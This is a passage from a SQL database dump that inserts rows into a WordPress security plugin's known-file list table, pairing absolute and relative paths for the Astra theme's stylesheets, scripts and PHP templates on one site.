(2755, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/group-title-rtl.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/group-title-rtl.css'),
(2756, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/group-title.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/group-title.css'),
(2757, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/heading-rtl.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/heading-rtl.css');
INSERT INTO `wpou_wfknownfilelist` VALUES
(2758, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/heading.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/heading.css'),
(2759, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/input-with-dropdowm-rtl.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/input-with-dropdowm-rtl.css'),
(2760, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/input-with-dropdowm.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/input-with-dropdowm.css'),
(2761, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/link-rtl.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/link-rtl.css'),
(2762, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/link.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/link.css'),
(2763, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/multi-select-rtl.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/multi-select-rtl.css'),
(2764, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/multi-select.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/multi-select.css'),
(2765, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/number-rtl.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/number-rtl.css'),
(2766, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/number.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/number.css'),
(2767, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/radio-icon-rtl.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/radio-icon-rtl.css'),
(2768, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/radio-icon.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/radio-icon.css'),
(2769, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/radio-image-rtl.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/radio-image-rtl.css'),
(2770, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/radio-image.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/radio-image.css'),
(2771, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/responsive-background-rtl.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/responsive-background-rtl.css'),
(2772, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/responsive-background.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/responsive-background.css'),
(2773, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/responsive-color-rtl.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/responsive-color-rtl.css'),
(2774, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/responsive-color.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/responsive-color.css'),
(2775, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/responsive-rtl.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/responsive-rtl.css'),
(2776, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/responsive-slider-rtl.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/responsive-slider-rtl.css'),
(2777, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/responsive-slider.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/responsive-slider.css'),
(2778, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/responsive-spacing-rtl.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/responsive-spacing-rtl.css'),
(2779, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/responsive-spacing.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/responsive-spacing.css'),
(2780, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/responsive-toggle-control-rtl.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/responsive-toggle-control-rtl.css'),
(2781, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/responsive-toggle-control.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/responsive-toggle-control.css'),
(2782, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/responsive.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/responsive.css'),
(2783, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/select-multi-rtl.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/select-multi-rtl.css'),
(2784, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/select-multi.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/select-multi.css'),
(2785, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/select-rtl.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/select-rtl.css'),
(2786, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/select.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/select.css'),
(2787, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/settings-group-rtl.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/settings-group-rtl.css'),
(2788, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/settings-group.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/settings-group.css'),
(2789, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/slider-rtl.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/slider-rtl.css'),
(2790, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/slider.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/slider.css'),
(2791, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/sortable-rtl.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/sortable-rtl.css'),
(2792, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/sortable.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/sortable.css'),
(2793, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/text-input-rtl.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/text-input-rtl.css'),
(2794, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/text-input.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/text-input.css'),
(2795, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/toggle-control-rtl.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/toggle-control-rtl.css'),
(2796, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/toggle-control.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/toggle-control.css'),
(2797, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/tooltip-rtl.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/tooltip-rtl.css'),
(2798, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/tooltip.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/tooltip.css'),
(2799, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/typography-rtl.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/typography-rtl.css'),
(2800, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/typography.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/typography.css'),
(2801, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/upgrade-rtl.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/upgrade-rtl.css'),
(2802, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/upgrade.css', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/css/unminified/upgrade.css'),
(2803, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/assets/js/unminified/custom-controls-plain.js', 'wp-content/themes/astra/inc/customizer/custom-controls/assets/js/unminified/custom-controls-plain.js'),
(2804, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/class-astra-customizer-control-base.php', 'wp-content/themes/astra/inc/customizer/custom-controls/class-astra-customizer-control-base.php'),
(2805, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/customizer-link/class-astra-control-customizer-link.php', 'wp-content/themes/astra/inc/customizer/custom-controls/customizer-link/class-astra-control-customizer-link.php'),
(2806, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/description/class-astra-control-description.php', 'wp-content/themes/astra/inc/customizer/custom-controls/description/class-astra-control-description.php'),
(2807, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/index.php', 'wp-content/themes/astra/inc/customizer/custom-controls/index.php'),
(2808, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/typography/class-astra-control-typography.php', 'wp-content/themes/astra/inc/customizer/custom-controls/typography/class-astra-control-typography.php'),
(2809, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/typography/index.php', 'wp-content/themes/astra/inc/customizer/custom-controls/typography/index.php'),
(2810, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/custom-controls/typography/selectWoo.css', 'wp-content/themes/astra/inc/customizer/custom-controls/typography/selectWoo.css'),
(2811, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/customizer-controls.php', 'wp-content/themes/astra/inc/customizer/customizer-controls.php'),
(2812, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/extend-custom-controls/build/index.js', 'wp-content/themes/astra/inc/customizer/extend-custom-controls/build/index.js'),
(2813, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/extend-customizer/class-astra-wp-customize-panel.php', 'wp-content/themes/astra/inc/customizer/extend-customizer/class-astra-wp-customize-panel.php'),
(2814, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/extend-customizer/class-astra-wp-customize-section.php', 'wp-content/themes/astra/inc/customizer/extend-customizer/class-astra-wp-customize-section.php'),
(2815, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/extend-customizer/class-astra-wp-customize-separator.php', 'wp-content/themes/astra/inc/customizer/extend-customizer/class-astra-wp-customize-separator.php'),
(2816, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/index.php', 'wp-content/themes/astra/inc/customizer/index.php'),
(2817, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/customizer/override-defaults.php', 'wp-content/themes/astra/inc/customizer/override-defaults.php'),
(2818, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/dynamic-css/astra-icons.php', 'wp-content/themes/astra/inc/dynamic-css/astra-icons.php'),
(2819, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/dynamic-css/block-editor-compatibility.php', 'wp-content/themes/astra/inc/dynamic-css/block-editor-compatibility.php'),
(2820, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/dynamic-css/comments-flex.php', 'wp-content/themes/astra/inc/dynamic-css/comments-flex.php'),
(2821, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/dynamic-css/comments.php', 'wp-content/themes/astra/inc/dynamic-css/comments.php'),
(2822, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/dynamic-css/container-layouts.php', 'wp-content/themes/astra/inc/dynamic-css/container-layouts.php'),
(2823, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/dynamic-css/content-background.php', 'wp-content/themes/astra/inc/dynamic-css/content-background.php'),
(2824, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/dynamic-css/custom-menu-old-header.php', 'wp-content/themes/astra/inc/dynamic-css/custom-menu-old-header.php'),
(2825, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/dynamic-css/global-color-palette.php', 'wp-content/themes/astra/inc/dynamic-css/global-color-palette.php'),
(2826, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/dynamic-css/inline-on-mobile.php', 'wp-content/themes/astra/inc/dynamic-css/inline-on-mobile.php'),
(2827, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/dynamic-css/live-search.php', 'wp-content/themes/astra/inc/dynamic-css/live-search.php'),
(2828, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/dynamic-css/navigation.php', 'wp-content/themes/astra/inc/dynamic-css/navigation.php'),
(2829, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/dynamic-css/pagination.php', 'wp-content/themes/astra/inc/dynamic-css/pagination.php'),
(2830, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/dynamic-css/single-post.php', 'wp-content/themes/astra/inc/dynamic-css/single-post.php'),
(2831, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/extras.php', 'wp-content/themes/astra/inc/extras.php'),
(2832, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/google-fonts.php', 'wp-content/themes/astra/inc/google-fonts.php'),
(2833, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/index.php', 'wp-content/themes/astra/inc/index.php'),
(2834, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/lib/astra-notices/class-astra-notices.php', 'wp-content/themes/astra/inc/lib/astra-notices/class-astra-notices.php'),
(2835, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/lib/astra-notices/notices.css', 'wp-content/themes/astra/inc/lib/astra-notices/notices.css'),
(2836, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/lib/astra-notices/notices.js', 'wp-content/themes/astra/inc/lib/astra-notices/notices.js'),
(2837, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/lib/batch-processing/class-astra-wp-async-request.php', 'wp-content/themes/astra/inc/lib/batch-processing/class-astra-wp-async-request.php'),
(2838, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/lib/batch-processing/class-astra-wp-background-process.php', 'wp-content/themes/astra/inc/lib/batch-processing/class-astra-wp-background-process.php'),
(2839, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/lib/docs/class-astra-docs-loader.php', 'wp-content/themes/astra/inc/lib/docs/class-astra-docs-loader.php'),
(2840, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/lib/webfont/class-astra-webfont-loader.php', 'wp-content/themes/astra/inc/lib/webfont/class-astra-webfont-loader.php'),
(2841, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/markup-extras.php', 'wp-content/themes/astra/inc/markup-extras.php'),
(2842, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/metabox/class-astra-meta-box-operations.php', 'wp-content/themes/astra/inc/metabox/class-astra-meta-box-operations.php'),
(2843, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/metabox/class-astra-meta-boxes.php', 'wp-content/themes/astra/inc/metabox/class-astra-meta-boxes.php'),
(2844, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/metabox/extend-metabox/build/index.js', 'wp-content/themes/astra/inc/metabox/extend-metabox/build/index.js'),
(2845, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/metabox/extend-metabox/css/minified/metabox-rtl.min.css', 'wp-content/themes/astra/inc/metabox/extend-metabox/css/minified/metabox-rtl.min.css'),
(2846, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/metabox/extend-metabox/css/minified/metabox.min.css', 'wp-content/themes/astra/inc/metabox/extend-metabox/css/minified/metabox.min.css'),
(2847, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/metabox/extend-metabox/css/unminified/metabox-rtl.css', 'wp-content/themes/astra/inc/metabox/extend-metabox/css/unminified/metabox-rtl.css'),
(2848, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/metabox/extend-metabox/css/unminified/metabox.css', 'wp-content/themes/astra/inc/metabox/extend-metabox/css/unminified/metabox.css'),
(2849, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/metabox/index.php', 'wp-content/themes/astra/inc/metabox/index.php'),
(2850, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/modules/posts-structures/assets/js/minified/customizer-preview.min.js', 'wp-content/themes/astra/inc/modules/posts-structures/assets/js/minified/customizer-preview.min.js'),
(2851, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/modules/posts-structures/assets/js/unminified/customizer-preview.js', 'wp-content/themes/astra/inc/modules/posts-structures/assets/js/unminified/customizer-preview.js'),
(2852, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/modules/posts-structures/class-astra-post-structures.php', 'wp-content/themes/astra/inc/modules/posts-structures/class-astra-post-structures.php'),
(2853, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/modules/posts-structures/class-astra-posts-structure-loader.php', 'wp-content/themes/astra/inc/modules/posts-structures/class-astra-posts-structure-loader.php'),
(2854, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/modules/posts-structures/class-astra-posts-structure-markup.php', 'wp-content/themes/astra/inc/modules/posts-structures/class-astra-posts-structure-markup.php'),
(2855, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/modules/posts-structures/css/archive-dynamic.css.php', 'wp-content/themes/astra/inc/modules/posts-structures/css/archive-dynamic.css.php'),
(2856, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/modules/posts-structures/css/single-dynamic.css.php', 'wp-content/themes/astra/inc/modules/posts-structures/css/single-dynamic.css.php'),
(2857, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/modules/posts-structures/css/special-dynamic.css.php', 'wp-content/themes/astra/inc/modules/posts-structures/css/special-dynamic.css.php'),
(2858, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/modules/posts-structures/customizer/class-astra-posts-archive-structures-configs.php', 'wp-content/themes/astra/inc/modules/posts-structures/customizer/class-astra-posts-archive-structures-configs.php'),
(2859, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/modules/posts-structures/customizer/class-astra-posts-single-structures-configs.php', 'wp-content/themes/astra/inc/modules/posts-structures/customizer/class-astra-posts-single-structures-configs.php'),
(2860, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/modules/posts-structures/customizer/class-astra-posts-special-archive-structures-configs.php', 'wp-content/themes/astra/inc/modules/posts-structures/customizer/class-astra-posts-special-archive-structures-configs.php'),
(2861, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/modules/posts-structures/customizer/class-astra-posts-structures-configs.php', 'wp-content/themes/astra/inc/modules/posts-structures/customizer/class-astra-posts-structures-configs.php'),
(2862, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/modules/related-posts/class-astra-related-posts-loader.php', 'wp-content/themes/astra/inc/modules/related-posts/class-astra-related-posts-loader.php'),
(2863, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/modules/related-posts/class-astra-related-posts-markup.php', 'wp-content/themes/astra/inc/modules/related-posts/class-astra-related-posts-markup.php'),
(2864, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/modules/related-posts/class-astra-related-posts.php', 'wp-content/themes/astra/inc/modules/related-posts/class-astra-related-posts.php'),
(2865, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/modules/related-posts/css/dynamic-css.php', 'wp-content/themes/astra/inc/modules/related-posts/css/dynamic-css.php'),
(2866, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/modules/related-posts/css/static-css.php', 'wp-content/themes/astra/inc/modules/related-posts/css/static-css.php'),
(2867, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/modules/related-posts/customizer/class-astra-related-posts-configs.php', 'wp-content/themes/astra/inc/modules/related-posts/customizer/class-astra-related-posts-configs.php'),
(2868, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/schema/class-astra-breadcrumb-schema.php', 'wp-content/themes/astra/inc/schema/class-astra-breadcrumb-schema.php'),
(2869, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/schema/class-astra-creativework-schema.php', 'wp-content/themes/astra/inc/schema/class-astra-creativework-schema.php'),
(2870, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/schema/class-astra-organization-schema.php', 'wp-content/themes/astra/inc/schema/class-astra-organization-schema.php'),
(2871, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/schema/class-astra-person-schema.php', 'wp-content/themes/astra/inc/schema/class-astra-person-schema.php'),
(2872, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/schema/class-astra-schema.php', 'wp-content/themes/astra/inc/schema/class-astra-schema.php'),
(2873, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/schema/class-astra-site-navigation-schema.php', 'wp-content/themes/astra/inc/schema/class-astra-site-navigation-schema.php'),
(2874, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/schema/class-astra-wpfooter-schema.php', 'wp-content/themes/astra/inc/schema/class-astra-wpfooter-schema.php'),
(2875, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/schema/class-astra-wpheader-schema.php', 'wp-content/themes/astra/inc/schema/class-astra-wpheader-schema.php'),
(2876, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/schema/class-astra-wpsidebar-schema.php', 'wp-content/themes/astra/inc/schema/class-astra-wpsidebar-schema.php'),
(2877, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/template-parts.php', 'wp-content/themes/astra/inc/template-parts.php'),
(2878, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/template-tags.php', 'wp-content/themes/astra/inc/template-tags.php'),
(2879, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/theme-update/astra-builder-migration-updater.php', 'wp-content/themes/astra/inc/theme-update/astra-builder-migration-updater.php'),
(2880, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/theme-update/astra-update-functions.php', 'wp-content/themes/astra/inc/theme-update/astra-update-functions.php'),
(2881, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/theme-update/class-astra-theme-background-updater.php', 'wp-content/themes/astra/inc/theme-update/class-astra-theme-background-updater.php'),
(2882, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/theme-update/class-astra-theme-wp-background-process.php', 'wp-content/themes/astra/inc/theme-update/class-astra-theme-wp-background-process.php'),
(2883, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/inc/widgets.php', 'wp-content/themes/astra/inc/widgets.php'),
(2884, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/index.php', 'wp-content/themes/astra/index.php'),
(2885, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/languages/astra.pot', 'wp-content/themes/astra/languages/astra.pot'),
(2886, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/page.php', 'wp-content/themes/astra/page.php'),
(2887, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/readme.txt', 'wp-content/themes/astra/readme.txt'),
(2888, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/screenshot.jpg', 'wp-content/themes/astra/screenshot.jpg'),
(2889, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/search.php', 'wp-content/themes/astra/search.php'),
(2890, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/searchform.php', 'wp-content/themes/astra/searchform.php'),
(2891, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/sidebar.php', 'wp-content/themes/astra/sidebar.php'),
(2892, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/single.php', 'wp-content/themes/astra/single.php'),
(2893, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/style.css', 'wp-content/themes/astra/style.css'),
(2894, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/template-parts/404/404-layout.php', 'wp-content/themes/astra/template-parts/404/404-layout.php'),
(2895, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/template-parts/404/index.php', 'wp-content/themes/astra/template-parts/404/index.php'),
(2896, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/template-parts/advanced-footer/layout-4.php', 'wp-content/themes/astra/template-parts/advanced-footer/layout-4.php'),
(2897, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/template-parts/archive-banner.php', 'wp-content/themes/astra/template-parts/archive-banner.php'),
(2898, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/template-parts/blog/blog-layout-4.php', 'wp-content/themes/astra/template-parts/blog/blog-layout-4.php'),
(2899, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/template-parts/blog/blog-layout-5.php', 'wp-content/themes/astra/template-parts/blog/blog-layout-5.php'),
(2900, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/template-parts/blog/blog-layout-6.php', 'wp-content/themes/astra/template-parts/blog/blog-layout-6.php'),
(2901, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/template-parts/blog/blog-layout.php', 'wp-content/themes/astra/template-parts/blog/blog-layout.php'),
(2902, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/template-parts/blog/index.php', 'wp-content/themes/astra/template-parts/blog/index.php'),
(2903, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/template-parts/content-404.php', 'wp-content/themes/astra/template-parts/content-404.php'),
(2904, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/template-parts/content-blog.php', 'wp-content/themes/astra/template-parts/content-blog.php'),
(2905, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/template-parts/content-none.php', 'wp-content/themes/astra/template-parts/content-none.php'),
(2906, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/template-parts/content-page.php', 'wp-content/themes/astra/template-parts/content-page.php'),
(2907, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/template-parts/content-single.php', 'wp-content/themes/astra/template-parts/content-single.php'),
(2908, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/template-parts/content.php', 'wp-content/themes/astra/template-parts/content.php'),
(2909, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/template-parts/footer/builder/components.php', 'wp-content/themes/astra/template-parts/footer/builder/components.php'),
(2910, '/home/equipm11/public_html/happythinking.com/wp-content/themes/astra/template-parts/footer/builder/desktop-builder-layout.php', 'wp-content/themes/astra/template-parts/footer/builder/desktop-builder-layout.php'),
